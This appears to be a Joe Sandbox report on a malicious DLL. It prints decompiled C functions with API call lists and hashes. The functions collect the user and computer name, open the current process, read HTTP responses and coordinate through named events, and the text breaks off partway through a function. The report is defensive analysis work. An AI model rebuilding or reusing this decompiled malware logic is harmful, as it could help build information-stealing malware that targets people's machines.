                    • Instruction ID: 6a04adc6c52124d2c5dfd556fe635db92aae6dcb60632bf736ccdfa445e51422
                    • Opcode Fuzzy Hash: d5cd9de3e18ec68f44c54e0f061cd531df8c5f45c346f311ac44628912fc1fb6
                    • Instruction Fuzzy Hash: 23F03A74300101DFEB249B58D869A1A7BB1BB44704B119049F982D7295D27AA800CF24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C4B71() {
                    				long _v8;
                    				long _v12;
                    				int _v16;
                    				long _t39;
                    				long _t43;
                    				signed int _t47;
                    				signed int _t52;
                    				int _t56;
                    				int _t57;
                    				char* _t63;
                    				short* _t66;
                    
                    				_v16 = 0;
                    				_v8 = 0;
                    				GetUserNameW(0,  &_v8);
                    				_t39 = _v8;
                    				if(_t39 != 0) {
                    					_v12 = _t39;
                    					_v8 = 0;
                    					GetComputerNameW(0,  &_v8);
                    					_t43 = _v8;
                    					if(_t43 != 0) {
                    						_v12 = _v12 + _t43 + 2;
                    						_t63 = E010C63FD(_v12 + _t43 + 2 << 2);
                    						if(_t63 != 0) {
                    							_t47 = _v12;
                    							_t66 = _t63 + _t47 * 2;
                    							_v8 = _t47;
                    							if(GetUserNameW(_t66,  &_v8) == 0) {
                    								L7:
                    								E010C17AB(_t63);
                    							} else {
                    								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                    								_t52 = _v8;
                    								_v12 = _v12 - _t52;
                    								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                    									goto L7;
                    								} else {
                    									_t56 = _v12 + _v8;
                    									_v12 = _t56;
                    									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t56 + 2, 0, 0);
                    									_v8 = _t57;
                    									if(_t57 == 0) {
                    										goto L7;
                    									} else {
                    										_t63[_t57] = 0;
                    										_v16 = _t63;
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _v16;
                    			}















                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 010C4B85
                    • GetComputerNameW.KERNEL32(00000000,?), ref: 010C4BA1
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 010C4BDB
                    • GetComputerNameW.KERNEL32(?,?), ref: 010C4BFD
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000040,00000000,00000000), ref: 010C4C20
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                    • String ID:
                    • API String ID: 3850880919-0
                    • Opcode ID: 31e66757d12f1ad19a4a504e44f0f58e24de2a42ed51f3a6873f87992d9b9ed9
                    • Instruction ID: 05ce7c634096d947577892c9f9a399da6804018121cd3a8d07434722d9a94297
                    • Opcode Fuzzy Hash: 31e66757d12f1ad19a4a504e44f0f58e24de2a42ed51f3a6873f87992d9b9ed9
                    • Instruction Fuzzy Hash: 1221D67690020CEFDB51DFA8C9C48EEBBF8FE44744B6084AAE541E7210EA349B45DF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C5A5A(intOrPtr _a4) {
                    				void* _t2;
                    				long _t4;
                    				void* _t5;
                    				long _t6;
                    				void* _t7;
                    				void* _t13;
                    
                    				_t2 = CreateEventA(0, 1, 0, 0);
                    				 *0x10ca30c = _t2;
                    				if(_t2 == 0) {
                    					return GetLastError();
                    				}
                    				_t4 = GetVersion();
                    				if(_t4 != 5) {
                    					L4:
                    					if(_t13 <= 0) {
                    						_t5 = 0x32;
                    						return _t5;
                    					}
                    					L5:
                    					 *0x10ca2fc = _t4;
                    					_t6 = GetCurrentProcessId();
                    					 *0x10ca2f8 = _t6;
                    					 *0x10ca304 = _a4;
                    					_t7 = OpenProcess(0x10047a, 0, _t6);
                    					 *0x10ca2f4 = _t7;
                    					if(_t7 == 0) {
                    						 *0x10ca2f4 =  *0x10ca2f4 | 0xffffffff;
                    					}
                    					return 0;
                    				}
                    				if(_t4 > 0) {
                    					goto L5;
                    				}
                    				_t13 = _t4 - _t4;
                    				goto L4;
                    			}










                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,010C4603,?), ref: 010C5A62
                    • GetVersion.KERNEL32 ref: 010C5A71
                    • GetCurrentProcessId.KERNEL32 ref: 010C5A88
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 010C5AA5
                    • GetLastError.KERNEL32 ref: 010C5AC4
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                    • String ID:
                    • API String ID: 2270775618-0
                    • Opcode ID: 79ac3271c1445b756d4f5cc9df43b0e51232d40a03a2a313d9e82d8bf58006cb
                    • Instruction ID: f39896ea5ef364278af38af4e87af4f8f82862f48cd124e38c51504244f10a5a
                    • Opcode Fuzzy Hash: 79ac3271c1445b756d4f5cc9df43b0e51232d40a03a2a313d9e82d8bf58006cb
                    • Instruction Fuzzy Hash: 6AF03774780326DFD7B09B6DAC49B183AA2A704B95F108559B9D6C61C8E2BB60818F1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 46%
                    			E010C3D67(intOrPtr* __eax) {
                    				void* _v8;
                    				WCHAR* _v12;
                    				void* _v16;
                    				char _v20;
                    				void* _v24;
                    				intOrPtr _v28;
                    				void* _v32;
                    				intOrPtr _v40;
                    				short _v48;
                    				intOrPtr _v56;
                    				short _v64;
                    				intOrPtr* _t54;
                    				intOrPtr* _t56;
                    				intOrPtr _t57;
                    				intOrPtr* _t58;
                    				intOrPtr* _t60;
                    				void* _t61;
                    				intOrPtr* _t63;
                    				intOrPtr* _t65;
                    				intOrPtr* _t67;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				intOrPtr* _t74;
                    				intOrPtr* _t76;
                    				intOrPtr _t78;
                    				intOrPtr* _t82;
                    				intOrPtr* _t86;
                    				intOrPtr _t102;
                    				intOrPtr _t108;
                    				void* _t117;
                    				void* _t121;
                    				void* _t122;
                    				intOrPtr _t129;
                    
                    				_t122 = _t121 - 0x3c;
                    				_push( &_v8);
                    				_push(__eax);
                    				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                    				if(_t117 >= 0) {
                    					_t54 = _v8;
                    					_t102 =  *0x10ca320; // 0x26dd5a8
                    					_t5 = _t102 + 0x10cb038; // 0x3050f485
                    					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                    					_t56 = _v8;
                    					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                    					if(_t117 >= 0) {
                    						__imp__#2(0x10c9290);
                    						_v28 = _t57;
                    						if(_t57 == 0) {
                    							_t117 = 0x8007000e;
                    						} else {
                    							_t60 = _v32;
                    							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                    							_t86 = __imp__#6;
                    							_t117 = _t61;
                    							if(_t117 >= 0) {
                    								_t63 = _v24;
                    								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                    								if(_t117 >= 0) {
                    									_t129 = _v20;
                    									if(_t129 != 0) {
                    										_v64 = 3;
                    										_v48 = 3;
                    										_v56 = 0;
                    										_v40 = 0;
                    										if(_t129 > 0) {
                    											while(1) {
                    												_t67 = _v24;
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												_t122 = _t122;
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                    												if(_t117 < 0) {
                    													goto L16;
                    												}
                    												_t69 = _v8;
                    												_t108 =  *0x10ca320; // 0x26dd5a8
                    												_t28 = _t108 + 0x10cb0bc; // 0x3050f1ff
                    												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                    												if(_t117 >= 0) {
                    													_t74 = _v16;
                    													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                    													if(_t117 >= 0 && _v12 != 0) {
                    														_t78 =  *0x10ca320; // 0x26dd5a8
                    														_t33 = _t78 + 0x10cb078; // 0x76006f
                    														if(lstrcmpW(_v12, _t33) == 0) {
                    															_t82 = _v16;
                    															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                    														}
                    														 *_t86(_v12);
                    													}
                    													_t76 = _v16;
                    													 *((intOrPtr*)( *_t76 + 8))(_t76);
                    												}
                    												_t71 = _v8;
                    												 *((intOrPtr*)( *_t71 + 8))(_t71);
                    												_v40 = _v40 + 1;
                    												if(_v40 < _v20) {
                    													continue;
                    												}
                    												goto L16;
                    											}
                    										}
                    									}
                    								}
                    								L16:
                    								_t65 = _v24;
                    								 *((intOrPtr*)( *_t65 + 8))(_t65);
                    							}
                    							 *_t86(_v28);
                    						}
                    						_t58 = _v32;
                    						 *((intOrPtr*)( *_t58 + 8))(_t58);
                    					}
                    				}
                    				return _t117;
                    			}


                    APIs
                    • SysAllocString.OLEAUT32(010C9290), ref: 010C3DB7
                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 010C3E99
                    • SysFreeString.OLEAUT32(00000000), ref: 010C3EB2
                    • SysFreeString.OLEAUT32(?), ref: 010C3EE1
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloclstrcmp
                    • String ID:
                    • API String ID: 1885612795-0
                    • Opcode ID: db37fe77fffcc4bcdde9862647f4e7ba2a2e5a91643a3e4b8a374c8cd41af7d1
                    • Instruction ID: 8db6313b04b4143b11ff96abf5dd9243de2364959db6a2f16a364fd4b7f5f69f
                    • Opcode Fuzzy Hash: db37fe77fffcc4bcdde9862647f4e7ba2a2e5a91643a3e4b8a374c8cd41af7d1
                    • Instruction Fuzzy Hash: 7A514A71E0050AEFCB11DFA8C4889AEF7B9FF89704B148598E955EB254D772AD01CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E010C420F(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				void _v156;
                    				void _v428;
                    				void* _t55;
                    				unsigned int _t56;
                    				signed int _t66;
                    				signed int _t74;
                    				void* _t76;
                    				signed int _t79;
                    				void* _t81;
                    				void* _t92;
                    				void* _t96;
                    				signed int* _t99;
                    				signed int _t101;
                    				signed int _t103;
                    				void* _t107;
                    
                    				_t92 = _a12;
                    				_t101 = __eax;
                    				_t55 = E010C25C1(_a16, _t92);
                    				_t79 = _t55;
                    				if(_t79 == 0) {
                    					L18:
                    					return _t55;
                    				}
                    				_t56 =  *(_t92 + _t79 * 4 - 4);
                    				_t81 = 0;
                    				_t96 = 0x20;
                    				if(_t56 == 0) {
                    					L4:
                    					_t97 = _t96 - _t81;
                    					_v12 = _t96 - _t81;
                    					E010C2E5D(_t79,  &_v428);
                    					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E010C375F(_t101,  &_v428, _a8, _t96 - _t81);
                    					E010C375F(_t79,  &_v156, _a12, _t97);
                    					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                    					_t66 = E010C2E5D(_t101, 0x10ca1d0);
                    					_t103 = _t101 - _t79;
                    					_a8 = _t103;
                    					if(_t103 < 0) {
                    						L17:
                    						E010C2E5D(_a16, _a4);
                    						E010C1212(_t79,  &_v428, _a4, _t97);
                    						memset( &_v428, 0, 0x10c);
                    						_t55 = memset( &_v156, 0, 0x84);
                    						goto L18;
                    					}
                    					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                    					do {
                    						if(_v8 != 0xffffffff) {
                    							_push(1);
                    							_push(0);
                    							_push(0);
                    							_push( *_t99);
                    							L010C818A();
                    							_t74 = _t66 +  *(_t99 - 4);
                    							asm("adc edx, esi");
                    							_push(0);
                    							_push(_v8 + 1);
                    							_push(_t92);
                    							_push(_t74);
                    							L010C8184();
                    							if(_t92 > 0 || _t74 > 0xffffffff) {
                    								_t74 = _t74 | 0xffffffff;
                    								_v16 = _v16 & 0x00000000;
                    							}
                    						} else {
                    							_t74 =  *_t99;
                    						}
                    						_t106 = _t107 + _a8 * 4 - 0x1a8;
                    						_a12 = _t74;
                    						_t76 = E010C2EE3(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                    						while(1) {
                    							 *_t99 =  *_t99 - _t76;
                    							if( *_t99 != 0) {
                    								goto L14;
                    							}
                    							L13:
                    							_t92 =  &_v156;
                    							if(E010C5776(_t79, _t92, _t106) < 0) {
                    								break;
                    							}
                    							L14:
                    							_a12 = _a12 + 1;
                    							_t76 = E010C4A1C(_t79,  &_v156, _t106, _t106);
                    							 *_t99 =  *_t99 - _t76;
                    							if( *_t99 != 0) {
                    								goto L14;
                    							}
                    							goto L13;
                    						}
                    						_a8 = _a8 - 1;
                    						_t66 = _a12;
                    						_t99 = _t99 - 4;
                    						 *(0x10ca1d0 + _a8 * 4) = _t66;
                    					} while (_a8 >= 0);
                    					_t97 = _v12;
                    					goto L17;
                    				}
                    				while(_t81 < _t96) {
                    					_t81 = _t81 + 1;
                    					_t56 = _t56 >> 1;
                    					if(_t56 != 0) {
                    						continue;
                    					}
                    					goto L4;
                    				}
                    				goto L4;
                    			}


                    APIs
                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 010C42C2
                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 010C42D8
                    • memset.NTDLL ref: 010C4381
                    • memset.NTDLL ref: 010C4397
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: memset$_allmul_aulldiv
                    • String ID:
                    • API String ID: 3041852380-0
                    • Opcode ID: 4b47c98a88a25dbb84647a010110dddc1922da6529a0d9e43b5f03fd07a8a436
                    • Instruction ID: 0bd21faf00962c97ab72a5f7ca0c9ecf7278cdee0691cd11ff979d2f51b6e7c0
                    • Opcode Fuzzy Hash: 4b47c98a88a25dbb84647a010110dddc1922da6529a0d9e43b5f03fd07a8a436
                    • Instruction Fuzzy Hash: 8C41BF31A0021AABDB10DF68DC51BEE77B5FF95B10F10856DF989A7281DB70AE448F90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 42%
                    			E010C135F(void* __eax, void* __ecx) {
                    				char _v8;
                    				void* _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				void* __esi;
                    				void* _t30;
                    				intOrPtr _t38;
                    				intOrPtr* _t39;
                    				intOrPtr* _t41;
                    				void* _t54;
                    				long _t64;
                    				void* _t67;
                    				void* _t69;
                    
                    				_t58 = __ecx;
                    				_t67 = __eax;
                    				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                    					L2:
                    					_t30 = _t67;
                    					_pop(_t68);
                    					_t69 = _t30;
                    					_t64 = 0;
                    					ResetEvent( *(_t69 + 0x1c));
                    					_push( &_v8);
                    					_push(4);
                    					_push( &_v20);
                    					_push( *((intOrPtr*)(_t69 + 0x18)));
                    					if( *0x10ca164() != 0) {
                    						L9:
                    						if(_v8 == 0) {
                    							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                    						} else {
                    							 *0x10ca174(0, 1,  &_v12);
                    							if(0 != 0) {
                    								_t64 = 8;
                    							} else {
                    								_t38 = E010C63FD(0x1000);
                    								_v16 = _t38;
                    								if(_t38 == 0) {
                    									_t64 = 8;
                    								} else {
                    									_push(0);
                    									_push(_v8);
                    									_push( &_v20);
                    									while(1) {
                    										_t41 = _v12;
                    										_t61 =  *_t41;
                    										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                    										ResetEvent( *(_t69 + 0x1c));
                    										_push( &_v8);
                    										_push(0x1000);
                    										_push(_v16);
                    										_push( *((intOrPtr*)(_t69 + 0x18)));
                    										if( *0x10ca164() != 0) {
                    											goto L17;
                    										}
                    										_t64 = GetLastError();
                    										if(_t64 == 0x3e5) {
                    											_t64 = E010C5867( *(_t69 + 0x1c), _t61, 0xffffffff);
                    											if(_t64 == 0) {
                    												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                    												if(_t64 == 0) {
                    													goto L17;
                    												}
                    											}
                    										}
                    										L19:
                    										E010C17AB(_v16);
                    										if(_t64 == 0) {
                    											_t64 = E010C16E7(_v12, _t69);
                    										}
                    										goto L22;
                    										L17:
                    										_t64 = 0;
                    										if(_v8 != 0) {
                    											_push(0);
                    											_push(_v8);
                    											_push(_v16);
                    											continue;
                    										}
                    										goto L19;
                    									}
                    								}
                    								L22:
                    								_t39 = _v12;
                    								 *((intOrPtr*)( *_t39 + 8))(_t39);
                    							}
                    						}
                    					} else {
                    						_t64 = GetLastError();
                    						if(_t64 != 0x3e5) {
                    							L8:
                    							if(_t64 == 0) {
                    								goto L9;
                    							}
                    						} else {
                    							_t64 = E010C5867( *(_t69 + 0x1c), _t58, 0xffffffff);
                    							if(_t64 == 0) {
                    								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                    								goto L8;
                    							}
                    						}
                    					}
                    					return _t64;
                    				} else {
                    					_t54 = E010C58EE(__ecx, __eax);
                    					if(_t54 != 0) {
                    						return _t54;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    			}


                    APIs
                    • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 010C2409
                    • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 010C2422
                    • ResetEvent.KERNEL32(?), ref: 010C249B
                    • GetLastError.KERNEL32 ref: 010C24B6
                      • Part of subcall function 010C58EE: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 010C5905
                      • Part of subcall function 010C58EE: SetEvent.KERNEL32(?), ref: 010C5915
                      • Part of subcall function 010C58EE: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 010C5947
                      • Part of subcall function 010C58EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 010C596C
                      • Part of subcall function 010C58EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 010C598C
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
                    • String ID:
                    • API String ID: 2176574591-0
                    • Opcode ID: 73409f7cb7371fcc82b85c4315d317810ebde750c033444b0b7e7b6d7d92eaee
                    • Instruction ID: 69e7ae2fb8e3b09324ac0d93e265c0fa991c2d08399b5101c1e6e93c3f4bce01
                    • Opcode Fuzzy Hash: 73409f7cb7371fcc82b85c4315d317810ebde750c033444b0b7e7b6d7d92eaee
                    • Instruction Fuzzy Hash: FD41D736600204EFDB629BA9DC40A9FB7F9AF84B60F1501ACF596D3591EB31D9418F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E010C3FD2(signed int _a4, signed int* _a8) {
                    				void* __ecx;
                    				void* __edi;
                    				signed int _t6;
                    				intOrPtr _t8;
                    				intOrPtr _t12;
                    				short* _t19;
                    				void* _t25;
                    				void* _t26;
                    				signed int* _t28;
                    				CHAR* _t30;
                    				long _t31;
                    				intOrPtr* _t32;
                    
                    				_t6 =  *0x10ca310; // 0xd448b889
                    				_t32 = _a4;
                    				_a4 = _t6 ^ 0x109a6410;
                    				_t8 =  *0x10ca320; // 0x26dd5a8
                    				_t3 = _t8 + 0x10cb87e; // 0x61636f4c
                    				_t25 = 0;
                    				_t30 = E010C32D0(_t3, 1);
                    				if(_t30 != 0) {
                    					_t25 = CreateEventA(0x10ca34c, 1, 0, _t30);
                    					E010C17AB(_t30);
                    				}
                    				_t12 =  *0x10ca2fc; // 0x2000000a
                    				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E010C2AB4() != 0) {
                    					L12:
                    					_t28 = _a8;
                    					if(_t28 != 0) {
                    						 *_t28 =  *_t28 | 0x00000001;
                    					}
                    					_t31 = E010C196A(_t32, _t26);
                    					if(_t31 == 0 && _t25 != 0) {
                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                    					}
                    					if(_t28 != 0 && _t31 != 0) {
                    						 *_t28 =  *_t28 & 0xfffffffe;
                    					}
                    					goto L20;
                    				} else {
                    					_t19 =  *0x10ca118( *_t32, 0x20);
                    					if(_t19 != 0) {
                    						 *_t19 = 0;
                    						_t19 = _t19 + 2;
                    					}
                    					_t31 = E010C78DB(0,  *_t32, _t19, 0);
                    					if(_t31 == 0) {
                    						if(_t25 == 0) {
                    							L22:
                    							return _t31;
                    						}
                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                    						if(_t31 == 0) {
                    							L20:
                    							if(_t25 != 0) {
                    								CloseHandle(_t25);
                    							}
                    							goto L22;
                    						}
                    					}
                    					goto L12;
                    				}
                    			}


                    APIs
                      • Part of subcall function 010C32D0: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,037A9D58,00000000,?,?,69B25F44,00000005,010CA00C,4D283A53,?,?), ref: 010C3306
                      • Part of subcall function 010C32D0: lstrcpy.KERNEL32(00000000,00000000), ref: 010C332A
                      • Part of subcall function 010C32D0: lstrcat.KERNEL32(00000000,00000000), ref: 010C3332
                    • CreateEventA.KERNEL32(010CA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,010C186F,?,?,?), ref: 010C4013
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,010C186F,00000000,00000000,?,00000000,?,010C186F,?,?,?), ref: 010C4071
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,010C186F,?,?,?), ref: 010C409F
                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,010C186F,?,?,?), ref: 010C40B7
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                    • String ID:
                    • API String ID: 73268831-0
                    • Opcode ID: d0dc600cb0c1b32b6af38b899a1725400d48567cfa5971fa8301191037db3145
                    • Instruction ID: e5a94ef73fb56d1fbc099333e4c7f0de85ddab804025a52f081487d4da91c1ba
                    • Opcode Fuzzy Hash: d0dc600cb0c1b32b6af38b899a1725400d48567cfa5971fa8301191037db3145
                    • Instruction Fuzzy Hash: 5C21DF326803119FD7715B6C8898AAE7AE8FF88F15F25025CFAC1DB145DB76D8018F51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E010C17C0(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                    				intOrPtr _v12;
                    				void* _v16;
                    				void* _v28;
                    				char _v32;
                    				void* __esi;
                    				void* _t29;
                    				void* _t38;
                    				signed int* _t39;
                    				void* _t40;
                    
                    				_t36 = __ecx;
                    				_v32 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v12 = _a4;
                    				_t38 = E010C6710(__ecx,  &_v32);
                    				if(_t38 != 0) {
                    					L12:
                    					_t39 = _a8;
                    					L13:
                    					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                    						_t23 =  &(_t39[1]);
                    						if(_t39[1] != 0) {
                    							E010C238A(_t23);
                    						}
                    					}
                    					return _t38;
                    				}
                    				if(E010C40C7(0x40,  &_v16) != 0) {
                    					_v16 = 0;
                    				}
                    				_t40 = CreateEventA(0x10ca34c, 1, 0,  *0x10ca3e4);
                    				if(_t40 != 0) {
                    					SetEvent(_t40);
                    					Sleep(0xbb8);
                    					CloseHandle(_t40);
                    				}
                    				_push( &_v32);
                    				if(_a12 == 0) {
                    					_t29 = E010C5E53(_t36);
                    				} else {
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_t29 = E010C2B1E(_t36);
                    				}
                    				_t41 = _v16;
                    				_t38 = _t29;
                    				if(_v16 != 0) {
                    					E010C4B59(_t41);
                    				}
                    				if(_t38 != 0) {
                    					goto L12;
                    				} else {
                    					_t39 = _a8;
                    					_t38 = E010C3FD2( &_v32, _t39);
                    					goto L13;
                    				}
                    			}













                    APIs
                    • CreateEventA.KERNEL32(010CA34C,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 010C1811
                    • SetEvent.KERNEL32(00000000), ref: 010C181E
                    • Sleep.KERNEL32(00000BB8), ref: 010C1829
                    • CloseHandle.KERNEL32(00000000), ref: 010C1830
                      • Part of subcall function 010C5E53: WaitForSingleObject.KERNEL32(00000000,?,?,?,010C1850,?,010C1850,?,?,?,?,?,010C1850,?), ref: 010C5F2D
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                    • String ID:
                    • API String ID: 2559942907-0
                    • Opcode ID: 7f522a570996508cdaf37cf2e9fe1446c38ad7809cda95075eba7fea70ea401e
                    • Instruction ID: beb24a713fe7fb517b8d2aff08542a4675600fa080efe0d5f00c942686bc7337
                    • Opcode Fuzzy Hash: 7f522a570996508cdaf37cf2e9fe1446c38ad7809cda95075eba7fea70ea401e
                    • Instruction Fuzzy Hash: 4021C532E04219EFDB20AFE888849DF77B9AB04B50B10846DFA91E7141D775D9498FE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E010C5ACD(unsigned int __eax, void* __ecx) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _t21;
                    				signed short _t23;
                    				char* _t27;
                    				void* _t29;
                    				void* _t30;
                    				unsigned int _t33;
                    				void* _t37;
                    				unsigned int _t38;
                    				void* _t41;
                    				void* _t42;
                    				int _t45;
                    				void* _t46;
